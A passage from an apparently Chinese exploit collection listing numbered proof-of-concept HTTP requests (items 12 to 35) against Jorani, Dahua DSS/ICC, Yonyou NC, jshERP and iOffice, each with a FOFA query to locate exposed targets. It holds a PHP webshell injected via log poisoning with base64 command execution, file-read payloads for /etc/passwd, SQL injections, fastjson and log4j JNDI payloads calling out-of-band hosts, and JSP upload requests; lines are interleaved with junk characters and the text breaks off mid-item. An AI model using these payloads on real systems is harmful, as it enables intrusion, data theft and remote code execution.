3 J1 L- ], M! ~# V. C0 s1 \Pragma: no-cache6 z0 r8 s# j4 M" w* X2 u
Cache-Control: no-cache
: [7 |! c8 [% Y, [2 QUpgrade-Insecure-Requests: 16 G4 M. X* F7 i6 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ x1 N( R' @3 D4 E% e, \/ I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 _- f. V7 r. u+ [9 U# k8 F& r; L
Accept-Encoding: gzip, deflate
Y, @: ?. C8 n1 QAccept-Language: zh-CN,zh;q=0.9,en;q=0.8% d" K5 x' p5 Z: [2 @) F4 J" y
Connection: close
' N2 X+ A) u$ U; a( P/ u' N2 J9 ~0 @7 U: C3 f0 y
2 S# H% `. y, J! b5 G: M8 J6 ]( Q
12. Jorani < 1.0.2 远程命令执行: N. g7 Z' @6 n( W2 M* f2 G
FOFA:title="Jorani"
* H' r% b" E! |% z8 @第一步先拿到cookie: ]' g# P" K+ S }9 Z0 t
GET /session/login HTTP/1.15 P' D( Y8 b& \. q! S$ H$ e8 V/ k6 ~
Host: 192.168.190.301 i6 g O# K; _
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36& \+ H8 F/ `! \( \$ P! p0 W
Connection: close
& Z' g5 i7 }" [* W5 r$ w3 _Accept-Encoding: gzip* X4 r9 G; F/ ~$ Q' Q+ W3 h! r% G) Q ?
1 T# e+ i) o" v* {% L
& }. l" {2 s9 w! U
响应中csrf_cookie_jorani用于后续请求
7 }$ `& q+ }8 EHTTP/1.1 200 OK5 r8 j' y" [9 h
Connection: close
9 \9 l8 D7 l/ o+ t% ZCache-Control: no-store, no-cache, must-revalidate
9 l% F( M0 @! D0 _; oContent-Type: text/html; charset=UTF-83 Y" t/ h0 ~+ }+ [4 g8 Q
Date: Tue, 24 Oct 2023 09:34:28 GMT
) V7 B% f; r9 P* F* J4 KExpires: Thu, 19 Nov 1981 08:52:00 GMT: w3 G, c$ P% m* e2 b) D$ ?0 a
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
1 @" Q5 L" k, [! hPragma: no-cache
3 G# h0 h$ F. n, U* O* q1 IServer: Apache/2.4.54 (Debian)% b- W; {& U |
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
4 Q" m( C" h8 O! |; H! MSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly4 c; G! j7 o$ m2 p; `/ w, W: G
Vary: Accept-Encoding5 [' f1 w$ h6 c# K9 v
' F: V1 _ L, w# A+ t
( `) X$ w7 k2 b3 B4 U" F$ ]1 lPOST请求,执行函数并进行base64编码2 X# w; ?$ Z8 ?: W1 ^% O
POST /session/login HTTP/1.1. }. B% H/ c, s. p% N2 N
Host: 192.168.190.30
& p# x0 S+ e" S% C$ n1 b* Y7 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36; i, \) X* e3 V3 Z6 W L) T* e
Connection: close
' U6 |! J' f( s" zContent-Length: 2524 i$ f, }1 k1 z$ d& V& G
Content-Type: application/x-www-form-urlencoded/ E9 O1 D1 }+ U/ ]4 w
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
& X/ k# e* t1 h( W" yAccept-Encoding: gzip4 [ }% h- }" T2 d" ?% S7 r7 `6 t
/ F9 o6 @7 `0 [" J5 Icsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
3 L1 S$ E5 j+ s
+ n4 s- l- Q, O3 Y/ H
( p' L/ N( a+ @( ?5 y: Q: {
( A" } N9 |/ Q* L/ z向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串& e2 A1 c- _* A( t# |
GET /pages/view/log-2023-10-24 HTTP/1.18 L1 n" Y* p" P+ M1 N
Host: 192.168.190.30, ~0 A6 g( S: |) T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 z; y# M- q8 q) H3 \Connection: close
, }: P+ K: i& v) qCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
0 f2 b2 ^, L# X: n% s0 UK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
1 ?" H! Y: z3 G. u# N% K+ H/ PX-REQUESTED-WITH: XMLHttpRequest9 F' ~( r& q8 v: Q
Accept-Encoding: gzip
5 n" \8 y" w. ]6 ]
9 n9 {: h9 f! o3 V) ?" _, J7 p# v8 {" l" i9 y4 Q+ T+ b; c
13. 红帆iOffice ioFileDown任意文件读取- z. [. T5 I" D( X" A0 w' ^6 u" j
FOFA:app="红帆-ioffice"
* U' y% H) Q% D2 V- B+ J/ ?5 XGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1# Q' b& O% a" R3 s1 V
Host: x.x.x.x" h: ~: e/ `6 N( l! }8 o1 ^: b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. s! {* d/ S: }3 M4 r3 F8 p- J
Connection: close9 X$ I& m8 G# g) w6 k
Accept: */*
6 |) T/ G; o; B9 cAccept-Encoding: gzip$ g& q4 ^. a3 H
) s0 u; {; q. U6 `8 y
7 D, }7 x( s( N# _: b14. 华夏ERP(jshERP)敏感信息泄露1 i1 \! U9 F6 }/ e" b7 U0 H. c
FOFA:body="jshERP-boot"2 q) S8 H, }* a6 p& L5 s/ t
泄露内容包括用户名密码7 Q0 r! ~$ u( l2 S0 m: _( P- Z
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1( N+ V- S; I% f1 A% Q; v
Host: x.x.x.x
) X% s6 x3 h9 n7 X bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
% D' E# q( k& uConnection: close, w: I3 x7 D, M+ `% `9 a
Accept: */*
7 M# N) h Y( N& s; r- |7 O7 fAccept-Language: en
) y/ X; y& ^" E0 v; XAccept-Encoding: gzip
' E" {. h7 [% c" l( V: q8 ^. ?% B3 w" K8 D' B
% x: f6 ^4 Y7 ]0 N- Z) ]15. 华夏ERP getAllList信息泄露
! v+ U9 V* A/ j6 F* g/ kCVE-2024-0490
8 }8 c' {6 o$ [FOFA:body="jshERP-boot"
1 A9 q. r; L) \. k% ~& P泄露内容包括用户名密码* V5 z$ C$ V+ k& r+ o% l! j1 t
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
' j+ s# k3 C( FHost: 192.168.40.130:100
" d! s0 e( y+ Y+ Q+ vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
) m+ B+ X$ k% YConnection: close4 C/ x5 p+ P$ z4 L+ z. K) S0 d
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
; S9 B6 [( X1 b7 yAccept-Language: en
; [6 I2 m$ r2 ]8 o: D5 v0 w. hsec-ch-ua-platform: Windows5 T( {; T, s5 [, P: ?
Accept-Encoding: gzip
: e, v6 Y n) [% N3 r$ y; W) J0 J8 u5 P, u7 Y
1 V* H7 w: d, Z4 w8 R3 N16. 红帆HFOffice医微云SQL注入
j/ K k+ F0 Y8 q# ?FOFA:title="HFOffice" v. ~- k1 {4 T: ?/ g( X; S' x
poc中调用函数计算1234的md5值: t1 k+ o/ @& C& B
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
1 x; `0 p/ P% H# V; s' XHost: x.x.x.x
' {% `; n/ C6 I* o) ZUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.362 z8 T1 z7 v! u. w" t
Connection: close
8 P! ]/ A' {8 dAccept: */*
8 c, G4 h% T- i+ @ w& @' eAccept-Language: en/ H& u+ _7 w+ P4 \5 \5 A( b# G
Accept-Encoding: gzip
8 ^5 D. ^1 m+ T6 G& p9 h0 G, C0 q7 F
9 o8 Z+ L5 a. i$ w) Q" b
17. 大华 DSS itcBulletin SQL 注入: R& w4 i j J, C$ O' L/ q1 }
FOFA:app="dahua-DSS"3 z: q% `: M- P/ H* u
POST /portal/services/itcBulletin?wsdl HTTP/1.1
6 X4 s! M4 N8 B& Z) [* WHost: x.x.x.x6 t. l% [6 \8 H7 A0 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" l( E% A& i9 _9 @9 jConnection: close# f& E- g, ^9 w/ q. n" D
Content-Length: 345
, n1 ~; l: Y3 ~) `$ K% L9 LAccept-Encoding: gzip
: R, y9 V$ O( F' u# d Y2 z& ~6 d. s& q
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
2 j% W4 f9 E8 O: P* V3 Z<s11:Body>
+ M1 R$ p5 k w2 ^ <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
: [5 F4 L6 n0 k; ] <netMarkings>* }) l) T s- h, j8 r
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=18 p, O: Y3 z) p* C3 N
</netMarkings>, T8 `; U8 @& U! ]6 r
</ns1:deleteBulletin>
' x7 G1 ^( ^9 W2 o+ T0 ?# J5 ] </s11:Body>
+ q0 v/ ~: s6 I$ n</s11:Envelope>* a; v$ I& ^' m G! [# e7 E! j# Y
4 N& f* \. M' j
0 H- t$ G1 F, t d- `, W; x18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
) m4 ^& c7 G. J! AFOFA:app="dahua-DSS"8 `6 A% F3 ]* {% X
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1# m% m2 T5 b8 \0 w
Host: your-ip
9 [9 Q% w+ T9 U4 \/ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 C2 E6 p7 r5 |+ d* r3 E. r" oAccept-Encoding: gzip, deflate
' N( O6 {- T' HAccept: */*
9 ?/ D1 x8 d( x% w! {Connection: keep-alive/ l, u6 [, u6 B5 u. ^( R! I' U
" Q$ F, h) m7 V; u+ ]% J1 i: W' N' @/ q) d& F! { R, h
1 A1 [' {. R) o e. C4 {19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入8 M$ ]7 X( d% c- O- l/ ^& K
FOFA:app="dahua-DSS", {/ h5 [3 C" m+ c
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
( Y& {! I- K& j& n" z$ CHost:
$ _ W) E: n( r6 `# x/ aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
3 f3 B0 ? o" \Accept-Encoding: gzip, deflate
' b) j6 _( W" o; @Accept: */*
3 E2 M u i$ y9 |. d+ VConnection: keep-alive" e8 L' q {# M0 {( M$ g
5 N0 h3 s! n: i+ W+ q
2 N8 h6 ^2 }' L9 V# u3 Y20. 大华ICC智能物联综合管理平台任意文件读取* k u/ \/ S; h2 Q5 J, w
FOFA:body="*客户端会小于800*"
8 R+ F7 z2 A( u* y0 |4 U/ ZGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1$ v0 Q2 N7 _7 H" y9 [6 M
Host: x.x.x.x' g. Y1 y; B5 j7 g
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% N' Z* |1 \) o) B& T7 V; E
Connection: close
* ?1 s* A) t5 ?5 t6 ZAccept: */*) F% H2 q% ?8 Y% B2 C8 P& Q
Accept-Language: en
- x% A! ~2 D3 T$ A! F' kAccept-Encoding: gzip+ a, J( z; l+ E1 f; T! {8 Y
' m& v4 a' y7 A" O: m" f4 K3 v
1 p0 D% |$ X! y' z. |7 R' ]( n$ T
21. 大华ICC智能物联综合管理平台random远程代码执行+ j) X, o) p7 Y" J A( m
FOFA:icon_hash="-1935899595"
E( B: K t5 X/ \, o2 t, @# ]POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1, ^! e3 b: l' J b8 x7 I! a
Host: x.x.x.x
% v0 A+ {% H" q% `( C- U; ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) T0 T6 l( s; G/ h% LContent-Length: 1619 c+ q1 o, S- a5 d
Accept-Encoding: gzip9 o V f" A( u6 ?$ q( Z5 i/ P
Connection: close
7 S' ], U. Y% L+ ? p0 g0 F$ ?Content-Type: application/json;charset=utf-8
" R9 x; e# {& E+ G4 [5 [% T" k+ H1 M/ j4 ?; U% o, [ n" k
{; L' x) ]* d6 Y% [
"a":{
3 s& Q c7 |% C9 s6 p. o! ~& { "@type":"com.alibaba.fastjson.JSONObject",1 A+ g, k) c9 T
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}9 m- l. d T, Y: z0 }) z* v
}""* V% O4 K* u4 i" l4 g
}
, Y0 j5 A" b% {. M
2 d4 X4 V, h ?: I% X
- n2 V* H" t4 u5 M! o4 a22. 大华ICC智能物联综合管理平台 log4j远程代码执行( h& Y2 [% X% J8 Y) e+ t
FOFA:icon_hash="-1935899595"& I1 y, J* {5 x9 d1 F. k
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1$ o9 _: {; J% p [0 {
Host: your-ip
; U$ X+ Y. w3 }: RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* J, ^! ?' s( ?6 s
Content-Type: application/json;charset=utf-8
6 g" A% \3 R6 s/ G& H2 ?: G
& r: p/ u8 [ ]1 U0 K( D{0 M: G' f# T% d" c5 N Z5 o' J) Q
"loginName":"${jndi:ldap://dnslog}"
. X; t5 c5 Z2 t' ?8 K}( ~/ c8 G! k+ @. x% s
' D p9 j1 ?6 z1 x+ Q' o( M H# m& q# } d6 Q, o+ B3 x P* _
+ b7 [9 E5 x/ g2 O( `23. 大华ICC智能物联综合管理平台 fastjson远程代码执行& P% F% W X6 u0 ^0 S- ^% w
FOFA:icon_hash="-1935899595"
9 a$ N$ p `* b: i: M: A( V+ dPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
{) @ G7 F% Q; G+ Y1 q3 v& AHost: your-ip& n0 i! Y% e! Q1 |+ q5 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. A q; y. i" {5 E/ D- Y5 N
Content-Type: application/json;charset=utf-8/ s- p: }# `0 i8 R, |
Accept-Encoding: gzip
, F% O* L* a$ |0 tConnection: close5 r# |/ d$ s2 n
7 J: p$ N, q8 [' u+ e- n{% `6 ]% u) R9 T
"a":{% W: l6 E/ u8 |0 e9 U* S& X
"@type":"com.alibaba.fastjson.JSONObject",3 z" o0 q1 j% y( N
{"@type":"java.net.URL","val":"http://DNSLOG"}
* D7 e' j# F3 d& V: U6 Q- a }"", `* b) d6 f" K1 X; T- |; I# r
}
7 d1 q) c: K7 a. Y% B% K2 W
. [( B+ F2 K9 `* }; D- y
( d" U+ E8 k4 ~- ?; f24. 用友NC 6.5 accept.jsp任意文件上传
8 W5 Y1 D" X$ m4 P+ v/ h2 c4 X3 xFOFA:icon_hash="1085941792"
' b. g% A% E0 v9 ~) RPOST /aim/equipmap/accept.jsp HTTP/1.1# K$ y* ?* W# q- t
Host: x.x.x.x1 X* u% ?/ A' [: y- n
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
. J3 `+ c% Q* { L8 k& t( GConnection: close$ M2 ^1 j& w4 p! Y
Content-Length: 449
/ h4 J* o8 I- k1 r8 O4 NAccept: */*
+ `( D) L# w; H$ m' LAccept-Encoding: gzip3 a1 ^8 W/ ? e0 t: i- ^" D
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc+ z. g% |8 B5 \$ b; ~) \% E
: Y/ C! u9 Q8 g- D* `-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
0 z2 Q3 j) ~# @9 }! ~1 m( ?Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
/ O) S- P; O. ]& c! w; kContent-Type: text/plain0 ~! W8 r3 n+ h: V0 {9 @9 m
7 ?+ @/ R5 v7 o. i) l m( {<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>6 A! X6 Q1 t, F; L8 X
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
! s, Y( r4 J% P% nContent-Disposition: form-data; name="fname"
0 U; w6 g, v: h9 Y& I$ U% s$ x' F
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
$ b- g/ e) X; p6 t-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--$ A1 q! ]/ D- `8 |
3 b" d v+ T1 c( c( B' S& l6 x$ q& F; ^% Y) E
25. 用友NC registerServlet JNDI 远程代码执行5 V7 b# S$ u1 ?3 q; Z' L4 k) b" e3 K
FOFA:app="用友-UFIDA-NC"/ Q& b3 ?1 ]+ m) g7 i
POST /portal/registerServlet HTTP/1.1
0 d. M4 z, \/ c i$ V, L6 tHost: your-ip% J- M. P: Y+ l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
" h) r N3 O7 p" l8 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.94 _8 o$ M+ A- m
Accept-Encoding: gzip, deflate
. d9 z2 p* _' vAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
7 O4 _! Z/ {( ~* D1 ~6 L' k* d AContent-Type: application/x-www-form-urlencoded' n% R: P- ]! u' T
# c) P; a! I! F4 n
type=1&dsname=ldap://dnslog1 K' v. }6 I6 S" p! r
* j, [) y& s2 `: D E
4 K Q- V3 c0 B: [2 T* E* l3 ^
. z0 `! }% ~% \& A- p7 v26. 用友NC linkVoucher SQL注入
# f. u$ }6 F$ ~2 z) y- vFOFA:app="用友-UFIDA-NC"0 d6 v) e0 R! j0 F9 A8 H& W5 b* T' ~
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 Q. N7 t4 S( U1 F5 m9 fHost: your-ip$ ~0 K- J+ F* d0 C! X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 i) [3 R- P' m0 PContent-Type: application/x-www-form-urlencoded
9 `) M' S$ C4 Z6 V- v! UAccept-Encoding: gzip, deflate2 B, N# K' G# O! E( K l% E( e
Accept: */*5 t) w: m* b5 L# z+ `( k
Connection: keep-alive7 H1 x: v: S! I3 @6 ?# x. n
( l. r- r) v" F" n7 J& \6 p6 ?% }! |1 M& {3 A7 y" p; t; S- P
27. 用友 NC showcontent SQL注入
/ V% X" T f* h2 L3 J, W: JFOFA:icon_hash="1085941792"
+ z" L: Q b* V) I* HGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1. x" L1 [ i2 ]) }, a: ]+ B) f/ @
Host: your-ip
9 H% j y$ O- X' z* XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. X# Z4 k. d% |6 dAccept-Encoding: identity
4 E! t- V* W8 @) \Connection: close
1 W/ e: m9 x- E2 U pContent-Type: text/xml; charset=utf-87 L8 S1 k9 m1 j9 ]& A
/ G6 m U1 Z7 w0 d. R3 _ Y0 I' G
- d, p6 g/ t+ ]1 I% _' f28. 用友NC grouptemplet 任意文件上传. C* P! i& ?9 q8 B; Q# @( b# e
FOFA:icon_hash="1085941792"8 H' J9 m# ~; j; w; U
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
3 U# t; _- e1 I# N3 B# y zHost: x.x.x.x
, v* [4 y# h* b! H/ J+ p0 v0 j5 E# pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36+ s& {, w3 K- w# k' Z5 t
Connection: close+ u5 H- y8 h1 `' y% Y; `
Content-Length: 268
) C6 y: P& L: H! W% N0 jContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk! R' ?+ ~& U: L1 i3 x2 t
Accept-Encoding: gzip+ l7 {( H" B) i" f
3 p$ S8 C" u; _: G------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
* K2 f. V8 c: ?5 k( gContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"- f$ P, Y" F5 i" S. T4 m H! f
Content-Type: application/octet-stream
' e2 M, k0 Q+ e) Y# O- ]
! O; y, I0 G3 C d7 Q: l4 w<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>: i* |/ Q% q d0 ?+ g1 P; n' G6 B
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--! @: @; Z) [8 u J S. ?: w# r/ o
B* [5 c- x$ n8 ]) ?1 _
* i+ T, p" m( L) }/ H# M7 u0 x/uapim/static/pages/nc/head.jsp( [3 m! p0 _$ l# x
) C' a. q" e4 f5 Y7 {. R0 p
29. 用友NC down/bill SQL注入3 K s" t; M, Z+ e/ `! i% A) B; L
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
5 S7 e) Q5 U8 V9 VGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
1 A2 C3 h$ i1 mHost: your-ip' G3 J& W( u8 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# p4 c2 T( V+ z! ^" V/ |1 O2 cContent-Type: application/x-www-form-urlencoded
* C C0 R. z5 k4 [% }9 E( |/ ^0 `5 nAccept-Encoding: gzip, deflate
6 _5 i2 V! n5 C+ {4 ?# u/ MAccept: */*
6 \" z. n! W: I; h, b, V! AConnection: keep-alive
' q3 j0 R& Z& [
( R5 l6 \! X! G) s
; z/ r6 @" ]5 ~; s* R30. 用友NC importPml SQL注入# V4 T9 f; n! ?3 D
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
9 d Q1 }: h* i) q* NPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
) t; A& n. Z- PHost: your-ip+ l! O. h6 n4 A% d( G6 k. Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V3 V, u' k# T8 H8 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, S' M& a- i+ Z. C5 r
Connection: close
/ b2 f7 J1 C. w K
% e, U4 o& R3 g------WebKitFormBoundaryH970hbttBhoCyj9V
- ~, x* X! Z% |Content-Disposition: form-data; name="Filedata"; filename="1.jpg"% @2 O, y4 b0 @' l7 m4 k" R- g/ F. S
Content-Type: image/jpeg5 w/ G. n, ~6 D- a* A
------WebKitFormBoundaryH970hbttBhoCyj9V--. I1 m# _& F1 E5 C0 R( g( _, a
6 _, W1 n6 K: Z+ a
1 q9 m, Y3 {( l- a) C& S$ ]) Y
31. 用友NC runStateServlet SQL注入
6 l/ e- w/ e% @6 Bversion<=6.5$ @$ U; Q: f! i7 ?4 g( t q9 H' w) E
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
7 ?- y5 ^3 E& O# \GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1, R8 G2 i' d T) _
Host: host
$ w9 a) T- Q- x/ U! `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% k4 d7 M1 E$ L. k z& z9 aContent-Type: application/x-www-form-urlencoded
, }0 F+ z6 m3 [& i( p6 k: c: \( k% h3 \6 l. I# }
4 @+ D/ Z* }. e1 K1 L; K5 i32. 用友NC complainbilldetail SQL注入
' t7 p- `# r6 P9 ~) pversion= NC633、NC65& ^/ U: l z3 \0 q4 @5 q" y
FOFA:app="用友-UFIDA-NC"
( t6 j+ B! g$ l- SGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
# f' r* S" K8 iHost: your-ip4 z& k( e$ [+ C9 R, P% z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% m+ l* }% b8 h
Content-Type: application/x-www-form-urlencoded* l) A k. o. }4 J, N- X5 E) ~9 J
Accept-Encoding: gzip, deflate& G, z3 G8 W6 D' F
Accept: */*
# u9 ]' e- y$ s- r3 U- p8 pConnection: keep-alive
& _ Y% w0 s& N& a& M1 {( s2 ~& x2 ]2 ?0 L1 E3 Y: S5 [
: y/ R2 E3 q/ G( n$ @
33. 用友NC downTax/download SQL注入
# J, y- G$ M* I/ E: I4 @version:NC6.5FOFA:app="用友-UFIDA-NC": l8 \" [7 s7 F% k& x
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1& G( v9 U2 w. t+ {( d' `' C* y
Host: your-ip
- n+ p. U0 d' M6 p9 V& o, l0 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 G# |* `) o/ tContent-Type: application/x-www-form-urlencoded4 z, w5 j" ?* E" ~2 f- p
Accept-Encoding: gzip, deflate. {7 [' H+ ?2 p' R1 M6 B& o
Accept: */*% W; m6 Y2 P2 L) G5 d6 C
Connection: keep-alive* R& L, s8 @! F, A4 E
9 B8 z" Y- W7 k- b/ V6 o
; X# Z+ n4 I" w6 `0 C) I34. 用友NC warningDetailInfo接口SQL注入
, U. ~+ e4 s1 _ j p+ FFOFA:app="用友-UFIDA-NC"
; s6 P+ g2 b- k) ^GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1* z1 m8 z8 m2 s& f8 }8 i
Host: your-ip
; y' E5 C5 ?+ r1 h' O W" CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 L; G) [3 P' D/ V7 bContent-Type: application/x-www-form-urlencoded2 O! A- |. i' H5 z2 j( [
Accept-Encoding: gzip, deflate
) ?; g, k# g& r' E' R+ cAccept: */*# d) e/ h; T% D. V
Connection: keep-alive
6 _2 C2 H- R# \
! F/ d: v9 M1 }# G- d& }; a7 g& I- w0 ~8 \
35. 用友NC-Cloud importhttpscer任意文件上传
+ u7 g a: T, j7 u9 ZFOFA:app="用友-NC-Cloud"
2 e# h+ \5 M+ P: }POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
) f" g0 b1 d7 P: ?$ {8 k7 w4 \Host: 203.25.218.166:8888 `& h5 g* c) ?# m
